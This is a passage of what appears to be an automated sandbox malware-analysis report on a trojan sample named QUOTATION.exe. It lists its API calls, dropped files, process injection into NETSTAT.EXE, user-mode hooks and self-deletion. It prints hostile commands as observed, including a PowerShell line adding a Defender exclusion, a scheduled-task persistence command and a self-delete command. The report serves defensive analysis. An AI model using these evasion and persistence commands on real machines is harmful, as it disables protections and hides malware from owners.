Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019A80 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0101AD30 NtSetContextThread
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019560 NtWriteFile
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010195F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0101A710 NtOpenProcessToken
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019730 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019760 NtOpenProcess
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0101A770 NtOpenThread
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019770 NtSetInformationFile
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019FE0 NtCreateMutant
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019610 NtEnumerateValueKey
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019650 NtQueryValueKey
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019670 NtQueryInformationProcess
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010196D0 NtCreateKey
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289A50 NtCreateFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289910 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_032899A0 NtCreateSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289860 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289840 NtDelayExecution, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289710 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289780 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289FE0 NtCreateMutant, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289660 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289650 NtQueryValueKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_032896E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_032896D0 NtCreateKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289540 NtReadFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_032895D0 NtClose, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289B00 NtSetValueKey
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0328A3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289A20 NtResumeThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289A10 NtQuerySection
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289950 NtQueueApcThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_032899D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289820 NtEnumerateKey
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0328B040 NtSuspendThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_032898A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_032898F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0328A710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289760 NtOpenProcess
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0328A770 NtOpenThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289770 NtSetInformationFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_032897A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0328AD30 NtSetContextThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03289560 NtWriteFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_032895F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0074A360 NtCreateFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0074A410 NtReadFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0074A490 NtClose
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0074A540 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0074A35B NtCreateFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0074A40A NtReadFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0074A48A NtClose
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0074A53C NtAllocateVirtualMemory
Source: QUOTATION.exe, 00000001.00000002.297891578.000000000040A000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameAppDomainInitializerIn.exeB vs QUOTATION.exe
Source: QUOTATION.exe, 00000001.00000002.302035905.00000000059B0000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameUI.dllF vs QUOTATION.exe
Source: QUOTATION.exe, 00000001.00000003.287892144.00000000037E4000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUI.dllF vs QUOTATION.exe
Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs QUOTATION.exe
Source: QUOTATION.exe, 0000000D.00000000.290403933.00000000003DA000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameAppDomainInitializerIn.exeB vs QUOTATION.exe
Source: QUOTATION.exe, 00000011.00000002.378944407.000000000125F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION.exe
Source: QUOTATION.exe, 00000011.00000000.296533989.00000000005CA000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameAppDomainInitializerIn.exeB vs QUOTATION.exe
Source: QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION.exe
Source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenamenetstat.exej% vs QUOTATION.exe
Source: QUOTATION.exe | Binary or memory string: OriginalFilenameAppDomainInitializerIn.exeB vs QUOTATION.exe
Source: QUOTATION.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: lQdAGavApIJoo.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: QUOTATION.exe | Virustotal: Detection: 40%
Source: QUOTATION.exe | ReversingLabs: Detection: 18%
Source: C:\Users\user\Desktop\QUOTATION.exe | File read: C:\Users\user\Desktop\QUOTATION.exe
Source: QUOTATION.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\QUOTATION.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\QUOTATION.exe "C:\Users\user\Desktop\QUOTATION.exe"
Source: C:\Users\user\Desktop\QUOTATION.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\QUOTATION.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmpJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXEJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\QUOTATION.exe"Jump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeFile created: C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeFile created: C:\Users\user\AppData\Local\Temp\tmp8E88.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@17/8@2/1
          Source: C:\Users\user\Desktop\QUOTATION.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: QUOTATION.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: QUOTATION.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmp
          Source: Binary string: netstat.pdb source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: QUOTATION.exe, 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: QUOTATION.exe, QUOTATION.exe, 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: QUOTATION.exe, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: lQdAGavApIJoo.exe.1.dr, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.QUOTATION.exe.360000.0.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.QUOTATION.exe.360000.0.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 13.0.QUOTATION.exe.330000.0.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 13.0.QUOTATION.exe.330000.3.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 13.0.QUOTATION.exe.330000.2.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 13.2.QUOTATION.exe.330000.0.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 13.0.QUOTATION.exe.330000.1.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.0.QUOTATION.exe.520000.0.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.2.QUOTATION.exe.520000.1.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.0.QUOTATION.exe.520000.3.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.0.QUOTATION.exe.520000.5.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.0.QUOTATION.exe.520000.1.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.0.QUOTATION.exe.520000.2.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.0.QUOTATION.exe.520000.7.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.0.QUOTATION.exe.520000.9.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 1_2_0036424F push es; iretd 1_2_0036425C
          Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 1_2_003642B1 push cs; iretd 1_2_003642CC
          Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 1_2_00364287 push cs; iretd 1_2_003642B0
          Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 1_2_003642DB push ss; iretd 1_2_003642F6
          Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 1_2_00DAE768 pushfd ; ret 1_2_00DAE769
          Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 13_2_0033424F push es; iretd 13_2_0033425C
          Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 13_2_003342B1 push cs; iretd 13_2_003342CC
          Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 13_2_00334287 push cs; iretd 13_2_003342B0
          Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 13_2_003342DB push ss; iretd 13_2_003342F6
          Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00417015 push esp; retf 17_2_00417041
          Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0041690B push cs; ret 17_2_0041690E
          Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0041D4B5 push eax; ret 17_2_0041D508
          Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0041D56C push eax; ret 17_2_0041D572
          Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0041D502 push eax; ret 17_2_0041D508
          Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0041D50B push eax; ret 17_2_0041D572
          Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0052424F push es; iretd 17_2_0052425C
          Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_005242DB push ss; iretd 17_2_005242F6
          Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00524287 push cs; iretd 17_2_005242B0
          Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_005242B1 push cs; iretd 17_2_005242CC
          Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0102D0D1 push ecx; ret 17_2_0102D0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0329D0D1 push ecx; ret 24_2_0329D0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_00747015 push esp; retf 24_2_00747041
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0074690B push cs; ret 24_2_0074690E
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0074DC11 push gs; ret 24_2_0074DC13
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0074D4B5 push eax; ret 24_2_0074D508
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0074D56C push eax; ret 24_2_0074D572
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0074D502 push eax; ret 24_2_0074D508
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0074D50B push eax; ret 24_2_0074D572
          Source: initial sample Static PE information: section name: .text entropy: 7.84988973797
          Source: C:\Users\user\Desktop\QUOTATION.exe File created: C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe

          Boot Survival:

          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\QUOTATION.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xE1
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: /c del "C:\Users\user\Desktop\QUOTATION.exe"
          Source: C:\Users\user\Desktop\QUOTATION.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
